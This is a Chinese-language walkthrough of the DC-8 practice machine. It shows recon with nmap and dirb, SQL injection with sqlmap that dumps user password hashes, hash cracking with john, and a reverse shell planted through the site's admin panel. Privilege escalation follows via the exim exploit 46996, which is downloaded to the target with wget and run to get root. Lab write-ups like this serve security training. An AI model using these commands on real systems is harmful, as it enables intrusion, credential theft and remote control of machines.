渗透DC-8-靶机文件共享
0x00 环境介绍 靶机环境介绍,本次渗透DC系列dc-8,
0x01 信息收集 使用同一局域网内,使用kali协助渗透
1)IP收集----192.168.213.152
arp-scan -l
2)端口扫描-----80
nmap -A -p- 192.168.213.152
3)目录爆破------后台地址
dirb http://192.168.213.152
进入web页面完成下一步渗透
0x02 渗透测试 进入web页面观察到url疑似存在sql注入
文章图片
使用sqlmap注入站点
sqlmap.py -u "http://192.168.213.152/?nid=3"
sqlmap -u"http://192.168.213.152/?nid=3" -D d7db --tables --batch
sqlmap -u"http://192.168.213.152/?nid=3" -D d7db -T users --column --batch
sqlmap -u"http://192.168.213.152/?nid=3" -D d7db -T users -C uid,name,pass --dump
注入得到hash加密账户密码‘
文章图片
将hash提取出来,使用kali的john解密,这里通过解发现admin无法解密出,只能将john解密
文章图片
得到账户密码,使用之前爆破出来的后台地址,登录后台页面
文章图片
开启搜集,发现到疑似存在命令执行的地方
文章图片
尝试输入phpinfo运行,用随机账户登录查看效果
文章图片
发现命令可以直接执行
文章图片
下一步可以写入一句话木马连接,或者使用反弹shell
这里我推荐使用反弹shell,方便后期的操作
这里使用kail自带的nc-shell脚本,删除注释行,重新编辑IP地址和端口号
文章图片
编辑内容,修改IP以及端口号
文章图片
提前kali准备接受nc
nc -lnvp 1234
删除之前的phpinfo代码,将shell脚本写入,填入随机账户信息查看
文章图片
反弹成功,使用交互shell获取命令行
文章图片
文章图片
0x03 权限提升 搜寻suid命令账户
find / -perm -u=s -a -type f 2> /dev/null
找到突破口,exim
文章图片
搜寻exim版本号,该版本存在漏洞,
exim4 --version
文章图片
使用search 寻找漏洞框架exp利用
searchsploit exim
文章图片
下载报告查看
searchsploit -m 46996
文章图片
vim查看发现编辑使用的dos,需要将文件里面内容转换格式
文章图片
格式转换 因为dos里面分隔符号与kali编辑不同,所以需要转换格式
dos2unix 46996.sh
【渗透DC-8-靶机文件共享】
文章图片
将文件传输到靶机,通过调用python模块实现
在当前文件目录开启外联
python -m SimpleHTTPServer8080
靶机在tmp目录下进行下载接受,防止其他位子没有权限
wget http://192.168.213.129:8080/46996.sh
文章图片
授权该文件,否则无法执行
文章图片
调用脚本nc外联
./46996.sh -m netcat
并且使用下列端口反弹
文章图片
kali提前接受端口,反弹即可,
文章图片
权限提升完成,这里dc-8反弹后很容易断开连接,简介即使使用shell交互防止断开
这里渗透提权完毕
推荐阅读
- webug3.0渗透基础第九、十关笔记
- 内网渗透|内网渗透-最实用的信息收集
- 铁柱学渗透06——SQL注入合集
- 铁柱学渗透04——后端基础PHP
- 铁柱学渗透03——后端基础SQL。
- 铁柱学渗透02——web前端基础
- 安全渗透|铁柱学渗透01—Web服务器通讯原理
- 铁柱学渗透05——正则表达式
- 雨里行山路
- php反序列化靶机serial实战